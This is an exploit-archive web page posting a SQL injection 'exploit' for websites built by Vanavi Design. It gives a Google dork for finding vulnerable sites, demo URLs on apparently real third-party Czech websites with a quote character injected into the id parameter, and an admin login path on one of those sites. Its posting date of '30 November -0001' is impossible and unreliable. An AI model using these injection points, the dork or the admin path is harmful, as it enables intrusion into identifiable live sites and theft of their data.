Home / exploits Vanavi Desing SQL Injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>Vanavi Desing SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Explot Title : Vanavi Desing SQL Injection # Google Dork : Design by Vanavi.com inurl:.php?id= # Date : 7-6-2016 # Eploite Author : MrHoudini & <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="83cef1adcbecf6e7eaedeab4b4c3c4eee2eaefade0ecee">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> # Vendor Homepage : http://www.Vanavi.com # Tested On : Windows # CVE : None Demo : http://www.friesen.cz/page.php?i=5%27 http://www.motowell.cz/prodejci.php?id=6%27 http://www.tichy-zubar.cz/eng/contact.php?id=14%27 Admin Panel : http://[PATH]/Admin/index.php Demo : http://www.tichy-zubar.cz/Admin/index.php </BODY></HTML>